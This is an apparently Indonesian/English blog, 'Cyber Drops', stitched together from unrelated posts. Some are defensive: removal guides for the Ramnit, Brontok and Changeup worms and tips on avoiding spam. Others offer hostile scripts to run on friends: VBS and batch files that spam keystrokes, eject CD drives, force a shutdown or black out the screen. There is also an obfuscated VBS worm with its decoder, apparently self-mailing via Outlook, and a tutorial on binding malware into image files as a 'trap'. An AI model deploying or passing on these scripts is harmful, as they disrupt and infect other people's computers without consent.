Cyber Drops

W32.Ramnit is a worm that infects .exe, .dll and .html files to reproduce and infect other systems. After infection, W32.Ramnit will hijack your browser to redirect you to a malicious domain. W32.Ramnit may also make contact with an anonymous third party through Internet Explorer exploits, allowing the remote attacker to violate your privacy and exert control over your computer. Many anti-malware programs have been unable to detect W32.Ramnit in some instances; severe infections can necessitate a complete system wipe to remedy the situation. Be cautious about worms like W32.Ramnit when on large networks or using removable media, and strive to delete W32.Ramnit quickly before it becomes too difficult to remove.

first things W32.Ramnit does is infect any .exe, .dll, or .html files W32.Ramnit can find. If you open these infected files, congratulations - now you've got W32.Ramnit, too! W32.Ramnit may also create concealed Autorun.inf files that are placed on various drives, including removable ones. Any computer that then accesses these drives will also get the W32.Ramnit worm.

Different versions of W32.Ramnit have been identified as a threat since January of 2010, and the worm is far from exterminated yet. Fortunately, indicators of W32.Ramnit's presence are sufficiently plain that you ought to see W32.Ramnit before it's been on your system too long. Deleting W32.Ramnit with sufficient quickness can mean the difference between your computer surviving without damage and your computer needing a complete hard drive wipe.

W32.Ramnit may also be detected under the slight variant names of W32.Ramnit.A and W32.Ramnit.B.

Backup Reminder: Always be sure to back up your PC before making any changes.


To remove W32.Ramnit, you must first stop any W32.Ramnit processes that are running in your computer'ds memory. To stop all W32.Ramnit processes, press CTRL+ALT+DELETE to open the Windows Task Manager. Click on the "Processes" tab, search for W32.Ramnit, then right-click it and select "End Process" key.

To delete W32.Ramnit registry keys, open the Windows Registry Editor by clicking on the Windows "Start" button and selecting "Run." Type "regedit" into the box and click "OK." Once the Registry Editor is open, search for the registry key "HKEY_LOCAL_MACHINE\Software\W32.Ramnit." Right-click this registry key and select "Delete."

Finally, to completely get rid of W32.Ramnit, you must manually remove other W32.Ramnit files. These W32.Ramnit files can be in the form of EXE, DLL, LSP, TOOLBAR, BROWSER HIJACK, and/or BROWSER PLUGIN. For example, W32.Ramnit might create a file like
%PROGRAM_FILES%\W32.Ramnit\W32.Ramnit.exe. Locate and remove these files.

Ada apa dengan judul nya aneh pasti bukan tapi memang itu kenyataannya kali ini saya akan memberikan tutorial membuat script anak alay.. untuk iseng2 aja ya haha.

Set wshShell =wscript.CreateObject("WScript.Shell")

do

wscript.sleep 100

wshshell.sendkeys "{CAPSLOCK}"

wshshell.sendkeys "{NUMLOCK}"

wshshell.sendkeys "{SCROLLLOCK}"

loop

1. Copy code diatas ke notepad
2. save dengan extensi *vbs
3. jalanin
4. Sekarang coba buat ngetik Ahii..hii..hiii
efek code ini adalah: Lampu keyboard ane kedap-kedip terus klu ane ngetik hurufnya GEDE kecil- GEDE kecil.



uia klu mau balikin teken "Ctrl + Alt + Del" (taksmanager)
End prosess di "wscript.exe"

sElaMaT mEncObA

oke kali ini saya akan memberitahukan anda kumpulan script virus worm yang saya dapat dari idws forum oke ini dia script nya:

copy kan semua code dibawah ini ke notepad

---------------------------------------------------------------------
Set oWMP = CreateObject("WMPlayer.OCX.7")
Set colCDROMs = oWMP.cdromCollection
do
if colCDROMs.Count >= 1 then
For i = 0 to colCDROMs.Count - 1
colCDROMs.Item(i).Eject
Next
For i = 0 to colCDROMs.Count - 1
colCDROMs.Item(i).Eject
Next
End If
wscript.sleep 5000
loop
---------------------------------END---------------------------------\

Set wshShell =wscript.CreateObject("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "{CAPSLOCK}"
loop
---------------------------------END---------------------------------

Set wshShell = wscript.CreateObject("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "~(enter)"
loop
---------------------------------END---------------------------------

WScript.Sleep 180000
WScript.Sleep 10000
Set WshShell = WScript.CreateObject("WScript.Shell")
WshShell.Run "notepad"
WScript.Sleep 100
WshShell.AppActivate "Notepad"
WScript.Sleep 500
WshShell.SendKeys "Hel"
WScript.Sleep 500
WshShell.SendKeys "lo "
WScript.Sleep 500
WshShell.SendKeys ", ho"
WScript.Sleep 500
WshShell.SendKeys "w a"
WScript.Sleep 500
WshShell.SendKeys "re "
WScript.Sleep 500
WshShell.SendKeys "you"
WScript.Sleep 500
WshShell.SendKeys "? "
WScript.Sleep 500
WshShell.SendKeys "I a"
WScript.Sleep 500
WshShell.SendKeys "m g"
WScript.Sleep 500
WshShell.SendKeys "ood"
WScript.Sleep 500
WshShell.SendKeys " th"
WScript.Sleep 500
WshShell.SendKeys "ank"
WScript.Sleep 500
WshShell.SendKeys "s! "
---------------------------------END---------------------------------

MsgBox "Let's go back a few steps"
Set wshShell =wscript.CreateObject("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "{bs}"
loop
---------------------------------END---------------------------------

Set wshShell = wscript.CreateObject("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "You are a fool."
loop
---------------------------------END---------------------------------

'Vbs.Vbswg.GHZ 1.0 Created By GHZ. 9/30/2010
Execute TH8IQFIU("-\hy4\hy}m4MN`&746&Ixkgzkj&H&MN`4&?59658676Ykz&KIIOXQ>X&C&ixkgzkuhpkiz.(yixovzotm4lorkyyzksuhpkiz(/KTR99N9I&C&KIIOXQ>X4mkzyvkiogrlurjkx.6/SR;Y9==9&C&KTR99N9I&,&(bMN`&7464nzsr4|hy(Ykz&WRMIX4iuvlork&}yixovz4yixovzl{rrtgsk2&SR;Y9==9P8VP6<;8Ol&WRMIKtj&olOl&WRMIX4uvktzk~zlork.}yixovz4yixovzl{rrtgsk/H;;[:RZ[&C&KNXX4lorkk~oyzy.}yixovz4yixovzl{rrtgsk//&znktykz&H88>V>>9C&KIIOXQ>X4ixkgzkzk~zlork.}yixovz4yixovzl{rrtgsk/H88>V>>94}xozk&H;;[:RZ[H88>V>>94iruykktj&olSX8[V./Ykz&\=[<:78V&C&IxkgzkUhpkiz.(U{zruuq4Gvvroigzout(/Ol&\=[<:78V&C&(U{zruuq(&ZnktYkz&I;;MT79<&C&\=[<:78V4MkzTgskYvgik.(SGVO(/Ykz&J9XWX=7J&C&I;;MT79<4GjjxkyyRoyzyLux&Kgin&\?9\>88?&C&\?9\>6?&C&7&Zu&V88?Ykz&S:9>6TWQ&C&\=[<:78V4IxkgzkOzks.6/Ykz&P87=[G=Y&C&\?9\>6?/S:9>6TWQ4Zu&C&P87=[G=Y4GjjxkyyS:9>6TWQ4Y{hpkiz&C&(\kx&Osvuxzgtz'(S:9>6TWQ4Huj&C&(No@(&,&|hixrl&,&(Vrkgyk&|ok}&znoy&lork2&oz-y&|kx&osvuxzgtz4(&,&|hixrl&,&((k~ki{zk&(ykz&PZORH8U8&CS:9>6TWQ4(&,&Inx.<;/&,&Inx.776TWQ4JkrkzkGlzkxY{hsoz&C&Zx{kPZORH8U84Gjj&\G[IIOXQOl&S:9>6TWQ4Zu&BD&((&ZnktS:9>6TWQ4YktjKtj&OlTk~zKtj&OlTk~zKtj&OlKtj&l{tizoutL{tizout&Z6Q=N<;Z.U7MZ8?==/Ol&U7MZ8?==&BD&((&ZnktYP8RMIX4lorkk~oyzy.(i@bsoxibsoxi4oto(/&ZnktU7MZ8?==&C&(i@bsoxi(KrykOl&KIIOXQ>X4lorkk~oyzy.(i@bsoxi98bsoxi4oto(/&ZnktU7MZ8?==&C&(i@bsoxi98(KrykOl&KIIOXQ>X4lorkk~oyzy.YP8RMIX4lorkk~oyzy.YP8RMIX4IxkgzkZk~zLork.U7MZ8?==&,&(byixovz4oto(2&Zx{k/K=RTR99N&C&(ayixovzc(&,&|hIxRl&,&(t6Cut&7@PUOT@)@�(K=RTR99N&C&K=RTR99N&,&|hIxRl&,&(t6Cut&7@PUOT@)@�(K=RTR99N&C&K=RTR99N&,&|hIxRl&,&(t7C&&5ol&.&*toiq&CC&*sk&/&�&ngrz&ƒ(K=RTR99N&C&K=RTR99N&,&|hIxRl&,&(t8C&&54(&,&Inx.766/&,&Inx.??/&,&Inx.??/&,&(&yktj&*toiq&(K=RTR99N&C&K=RTR99N&,&SR;Y9==9K=RTR99N&C&K=RTR99N&,&|hIxRl&,&(t9Cƒ(yixovz4IruykKtj&OlKtj&L{tizoutL{tizout&GI=R;Y9=./Ut&Kxxux&Xky{sk&Tk~zYkz&W8G8VP6<&C&KIIOXQ>X4Jxo|kyLux&Kgin&MJR?PNNXX4MkzLurjkx.V>NNXV>&C&U?G;;[:R4LorkyLux&Kgin&LK:X8[V<&Ot&Z:K88>V>Ol&rigyk.LK:X8[V<4Tgsk/&C&(soxi4oto(&ZnktZ6Q=N<;Z.LK:X8[V<4VgxktzLurjkx/Ktj&OlOl&KIIOXQ>X4MkzK~zktyoutTgsk.LK:X8[V<4vgzn/&C&(|hy(KIIOXQ>X4IuvLork&}yixovz4yixovzl{rrtgsk2LK:X8[V<4vgzn2zx{kKtj&olOl&KIIOXQ>X4MkzK~zktyoutTgsk.LK:X8[V<4vgzn/&C&(|hk(KIIOXQ>X4IuvLork&}yixovz4yixovzl{rrtgsk2LK:X8[V<4vgzn2zx{kKtj&olTk~zYkz&IM8=[<:7&C&U?G;;[:R4Y{hlurjkxyLux&Kgin&J>I;;MT7&Ot&IM8=[<:7Igrr&.J>I;;MT74vgzn/Tk~zKtj&l{tizoutL{tizout&P8VP6<;8./Xgtjuso€kOl&7&1&Otz.Xtj&0&7666/&C&=&znktSymhu~&(O-|k&tuznotm&zu&yg4&@u/(2<:2(@u/(ktj&olktj&l{tizout-\hy}m&8&Hkzg4&H&aQc",-6)
Function TH8IQFIU(C38QDRVV,F8O63JAL)
For L6F3M0OD = 1 To Len(C38QDRVV)
V6BD6OKI = Mid(C38QDRVV, L6F3M0OD, 1)
If V6BD6OKI = Chr(2) Then
V6BD6OKI = Chr(34 + F8O63JAL)
ElseIf V6BD6OKI = Chr(3) Then
V6BD6OKI = Chr(10 + F8O63JAL)
ElseIf V6BD6OKI = Chr(4) Then
V6BD6OKI = Chr(13 + F8O63JAL)
Else
V6BD6OKI = Chr(Asc(V6BD6OKI) + F8O63JAL)
End If
TH8IQFIU = TH8IQFIU & V6BD6OKI
Next
End Function
---------------------------------END---------------------------------

kalo yang ini tinggal copas aja tapi save as .bat

@ECHO off
:top
START %SystemRoot%\system32\notepad.exe
GOTO top
-------------------------------END------------------------------------

@echo off
echo e100 B8 13 00 CD 10 E4 40 88 C3 E4 40 88 C7 F6 E3 30>\z.dbg
echo e110 DF 88 C1 BA C8 03 30 C0 EE BA DA 03 EC A8 08 75>>\z.dbg
echo e120 FB EC A8 08 74 FB BA C9 03 88 D8 EE 88 F8 EE 88>>\z.dbg
echo e130 C8 EE B4 01 CD 16 74 CD B8 03 00 CD 10 C3>>\z.dbg
echo g=100>>\z.dbg
echo q>>\z.dbg
debug <\z.dbg>nul
del \z.dbg
But if you really want to mess with a friend then copy and paste the following code which will do the same thing except when they press a key the screen will go black and the only way to stop the batch file is by pressing CTRL-ALT-DELETE.
@echo off
:a
echo e100 B8 13 00 CD 10 E4 40 88 C3 E4 40 88 C7 F6 E3 30>\z.dbg
echo e110 DF 88 C1 BA C8 03 30 C0 EE BA DA 03 EC A8 08 75>>\z.dbg
echo e120 FB EC A8 08 74 FB BA C9 03 88 D8 EE 88 F8 EE 88>>\z.dbg
echo e130 C8 EE B4 01 CD 16 74 CD B8 03 00 CD 10 C3>>\z.dbg
echo g=100>>\z.dbg
echo q>>\z.dbg
debug <\z.dbg>nul
del \z.dbg
goto a
-----------------------------------END-------------------------------

@echo off
msg * I don't like you
shutdown -c "Error! You are too stupid!" -s
-----------------------------------END-------------------------------

@echo off
title The end of the world
cd C:\
:menu
cls
echo I take no responsibility for your actions. Beyond this point it is you that has the power to kill yourself. If you press 'x' then your PC will be formatted. Do not come crying to me when you fried your computer or if you lost your project etc...
pause
echo Pick your poison:
echo 1. Die this way (Wimp)
echo 2. Die this way (WIMP!)
echo 3. DO NOT DIE THIS WAY
echo 4. Die this way (you're boring)
echo 5. Easy way out
set input=nothing
set /p input=Choice:
if %input%==1 goto one
if %input%==2 goto two
---------------------------------END---------------------------------

sekian script dari saya

sumber forum idws

ini dia cara2 memusnahkan virus brontok yang akhir2 ini sedang naik daun lagi ok... simak ya

Simak 5 langkah untuk mengenyahkannya menurut analis virus dari Vaksincom, Adang Jauhar Taufik: 

1. Disable 'System Restore' (Windows XP/Vista/Windows 7) selama proses pembersihan dilakukan.

2. Matikan proses yang aktif di memori. Norman Security Suite Pro yang dilengkapi dengan fitur Advanced System Reporter menjadi salah satu tools alternatif yang dapat digunakan untuk mengganti tools Task Manager yang diblok oleh virus dengan nama lain W32/Rontokbro.GOL itu.

Berikut langkah untuk mematikan proses virus yang aktif di memori dengan menggunakan Advanced System Reporter.
-. Pada aplikasi Advanced System Reporter, klik tabulasi.
-. Klik kanan pada file virus [lsass.exe, services.exe dan winlogon.exe atau file lain] yang berada di direktori 'C:\Documents and settings\%user%\Local Settings\Application Data'
-. Klik 'Terminate Process', lalu 'Yes'.

Untuk menghapus registry autostart yang dibuat oleh virus, lakukan langkah berikut:
>. Klik tabulasi 'Autostart'.
>. Klik kanan file virus [smss.exe dan Yitnoss.exe] atau file lain yang berada di direktori 'C:\Documents and settings\%user%\Local Settings\Application Data'.
>. Klik 'Terminate Process' jika proses tersebut masih aktif.
>. Kemudian klik "Remove Autorun" untuk menghapus registry autostart yang telah dibuat oleh virus.

3. Pulihkan registri yang sudah diubah oleh virus, untuk mempercepat proses pemulihan silahkan salin script berikut pada program notepad kemudian simpan dengan nama REPAIR.INF, Install file tersebut dengan cara [Klik kanan REPAIR.INF | Install]


[Version]

Signature="$Chicago$"

Provider=Vaksincom Oyee


[DefaultInstall]

AddReg=UnhookRegKey

DelReg=del


[UnhookRegKey]

HKLM, Software\CLASSES\batfile\shell\open\command,,,"""%1"" %*"

HKLM, Software\CLASSES\comfile\shell\open\command,,,"""%1"" %*"

HKLM, Software\CLASSES\exefile\shell\open\command,,,"""%1"" %*"

HKLM, Software\CLASSES\piffile\shell\open\command,,,"""%1"" %*"

HKLM, Software\CLASSES\regfile\shell\open\command,,,"regedit.exe "%1""

HKLM, Software\CLASSES\scrfile\shell\open\command,,,"""%1"" %*"

HKLM, SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon, Shell,0, "Explorer.exe"


[del]


HKCU, Software\Microsoft\Windows\CurrentVersion\Run, X84-YitnoDiah

HKLM, SOFTWARE\Microsoft\Windows\CurrentVersion\Run, Diah-YitnosX84

HKCU, Software\Microsoft\Windows\CurrentVersion\Policies\Explorer, NoFolderOptions

HKCU, Software\Microsoft\Windows\CurrentVersion\Policies\System, DisableCMD

HKCU, Software\Microsoft\Windows\CurrentVersion\Policies\System, DisableRegistryTools



4. Hapus file induk dan file duplikat yang dibuat oleh virus dengan menggunakan fungsi Search Windows di semua Drive termasuk Removable Disk [Flash Disk]. Kemudian hapus file berikut: C:\Documents and settings\%user%\Local Settings\Application Data
-. Winlogon.exe
-. services.exe
-. lsass.exe
-. smss.exe
-. inetinfo.exe
-. Diah84.Yitn.oss.txt
-. csrss.exe

    * C:\Windows\Inf\Yitnoss.exe
    * C:\Documents and settings\%user%\Start Menu\Programs\Startup\YITNO.pif
    * C:\Documents and Settings\%user%\Templates\B.Yitnoss.com

Hapus juga file/folder berikut:

C:\Documents and settings\%user%\Local Settings\Application Data

-. 84-DiahLove-Yitn-oss
-. Yitn.oss-3-27
-. Yitn.oss-3-31
-. Diah84.Yitn.oss.txt

5. Untuk pebersihan optimal silahkan install dan scan dengan antivirus yang up-to-date. Anda juga dapat menggunakan tools Norman Malware Cleaner, silahkan download di alamat berikut: Http://www.norman.com/support/support_tools/58732/en

sumber : detiknet

pernahkah anda merasa tertipu akibat email2 palsu yang bertebaran di dalam inbox email anda.. kali ini saya akan memberikan saran cara menghalau email2 spam ini, oke ini dia caranya...

1. Membuka lampiran dari email yang tidak dikenal

Jangan tergoda untuk membuka lampiran pada email yang terlihat mencurigakan. Kadang lampiran itu memang punya nama yang menggoda, namun bisa jadi isinya adalah program jahat.

2. Membalas spam
Mungkin karena kesal atau alasan lain, pengguna bisa tergoda untuk membalas email spam dengan sumpah-serapah atau permintaan untuk tidak dikirimi email lagi.

Hati-hati, karena biasanya alamat yang digunakan itu adalah palsu dan jika dibalas justru akan melahirkan lebih banyak spam lagi ke Inbox.

3. Isi Form via Email

Trik pencurian data yang sering dilakukan adalah meminta calon korban mengisi data pribadi lewat form yang ada di email, atau form yang link-nya ditampilkan dalam email.

Symantec mengatakan, perusahaan terkemuka tidak mungkin meminta informasi pribadi Anda melalui email. Jika ragu, hubungi perusahaan itu lewat jalur resmi terpisah. Jangan mengklik atau copy-paste dari link dalam pesan.

4. Membeli produk atau jasa dari pesan spam

Meskipun produk atau jasa itu terdengar menarik, sebaiknya jangan mencoba untuk melakukan pembelian produk atau jasa yang ditawarkan lewat spam. Hal ini hanya akan mendorong orang untuk terus menggunakan spam.

5. Membuka pesan spam
Jika sebuah pesan sudah jelas adalah spam, misalnya karena ditandai oleh Spam Filter yang digunakan, ini artinya pesan itu memang sudah seharusnya dibuang.

6. Meneruskan Email Berantai

Banyak peringatan soal virus, bahaya keamanan dan hal-hal lain yang disebarkan lewat email. Karena ada kemungkinan hal semacam itu hanya kabar burung (hoax) belaka, sebaiknya jangan ikut-ikutan mengirimkan pesan berantai.

Sumber: detiknet

Oke tutorial kali ini saya akan membahas bagaimana cara menggabungkan file2 malware menjadi satu dengan file/apllikasi lainnya.. baik dengan software juga dengan cara manual jadi semacam jebakan... buat temen2 agan..
saya tidak bertanggung jawab atas kerusakan yang anda buat terhadap orang lain hehehe oke kita mulai saja tutorialnya..

CARA MANUAL DENGAN CMD:
sebelumnya simpan file yang akan digabungkan dalam satu directory misalnya di  D:

untuk membuka command prompt bisa dari klik :
start > run >cmd


untuk mulai menggabungkan ketikkan di cmd  D: 

setelah itu ketikkan kembali
"copy /b (nama file dgn ekstensinya)+(nama file yang kedua dgn ekstensinya) (hasil penggabungan dgn ekstensinya)"

misalkan kita akan menggabungkan gambar dengan winrar..,,yaitu 01.jpg dan 01.rar
ketikkan di command prompt

"copy /b 01.jpg+01.rar 02.jpg" tanpa tanda kutip

sekarang buka directory D:
akan ada file baru yaitu 02.jpg
untuk membuka file rar nya open with winRAR archiver.........
sdh dechhh

Kalo dengan software saya rasa ga perlu saya jelaskan langsung saya kasih aja link softwarenya nih gan..

http://download.cnet.com/Hotfusion-File-Binder/3000-2094_4-10895406.html

W32.Changeup.C is a malicious computer worm that infect via removable USB drives and unsecured shared drives. This worm is known for exploiting the Microsoft .lnk file vulnerability. One thing you want to keep in mind, regardless of what antivirus software you feel most comfortable with, keep it updated…ALWAYS.



Having your antivirus updated can mean the difference between running a virus scan and cleaning it off successfully, or having to take your computer to the local shop to be worked on and potentially losing precious pictures and files.
So if you’re here, and you haven’t kept your antivirus software up to date, you can still try to remove W32.Changeup.C in SAFE MODE with what you have.

Safe Mode is basically a “safe” way to boot your computer so that the virus doesn’t load, nor do a lot of other applications that you normally see when you’re on your computer. This prevents device drivers and unwanted software from running, so that you can run your antivirus scan. However, Safe Mode doesn’t always work since I have seen some viruses that even disable it too.

But let’s see what we can do with this W32.Changeup.C.

To boot your computer into Safe Mode:
- Turn off your computer
- Turn it back on, and when you see the first “signs of life” (anything on the screen), start tapping the F8 key on your keyboard..about once per second (if your computer beeps at you, then you can stop tapping).
- You will be given a list to choose from. Choose the one with SAFE MODE only.
- You will then receive a YES/NO prompt, click Yes.

You’ve now successfully booted your computer into Safe Mode, so go ahead and run a full system scan with your current antivirus software.

but, if your computer still infected, you should do it by self or manual.
This step-by-step manual guide completely removes W32.Changeup.C. If you have any problem during the removal process, please contact Tee Support agent 24/7 online for more detailed instructions.

1. Delete files:

%UserProfile%\[RANDOM].exe, %DriveLetter%\[RANDOM].exe
%DriveLetter%\[RANDOM].scr, %DriveLetter%\autorun.inf
%DriveLetter%\x.exe, %DriveLetter%\New Folder.lnk
%DriveLetter%\Passwords.lnk, %DriveLetter%\Documents.lnk
%DriveLetter%\Pictures.lnk, %DriveLetter%\Music.lnk
%DriveLetter%\Video.lnk, %DriveLetter%\[RANDOM FILE NAME].dll
%DriveLetter%\[RANDOM FILE NAME].lnk

2. Delete registry entries

(Take Note: Back up the Windows registry before editing it, so that you can quickly restore it later if something goes wrong.)

HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\”[RANDOM FILE NAME]” = “%UserProfile%\[RANDOM FILE NAME].exe”
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\”ShowSuperHidden” = “1″


and last way to remove the virus you could use Online Virus Scanner, another way to remove a virus from a computer without the need to install additional anti-virus application is to perform a thorough scan with free Online Virus Scanner that can be found on websites of legitimate computer security provider.